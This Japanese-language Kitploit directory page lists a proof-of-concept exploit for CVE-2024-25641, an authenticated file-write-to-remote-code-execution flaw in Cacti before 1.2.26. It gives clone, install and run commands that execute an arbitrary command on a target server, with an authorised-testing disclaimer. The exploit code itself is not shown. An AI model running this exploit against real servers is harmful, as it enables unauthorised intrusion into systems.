Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25641-CACTI-RCE-1.2.26 — 完全自動化されたPoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵 | Kitploit
ツール/GitHubGitHub/stopthattalace/cve-2024-25641-cacti-rce-1.2.26
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubstopthattalace/cve-2024-25641-cacti-rce-1.2.26

CVE-2024-25641-CACTI-RCE-1.2.26

完全自動化されたPoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
711年前未レビュー

CVE-2024-25641 - Cacti 1.2.26 - 任意ファイル書き込みからRCEへ 🌵

  • 認証済みRCE
  • Cacti version < v1.2.26

概要


「パッケージインポート」機能を介して悪用可能な任意ファイル書き込みの脆弱性により、「テンプレートのインポート」権限を持つ認証済みユーザーが、Webサーバー上で任意のPHPコードを実行(RCE)できます。

概念実証


CVE DEMO

使用方法


root@kitploit:~
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

poetryを使用する場合

root@kitploit:~
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

免責事項

このツールは教育およびテスト目的専用です。本ツールの作者は、本ツールを使用して行われる不正使用や違法行為について一切責任を負いません。このツールは、自分が所有するシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。

ツールをダウンロード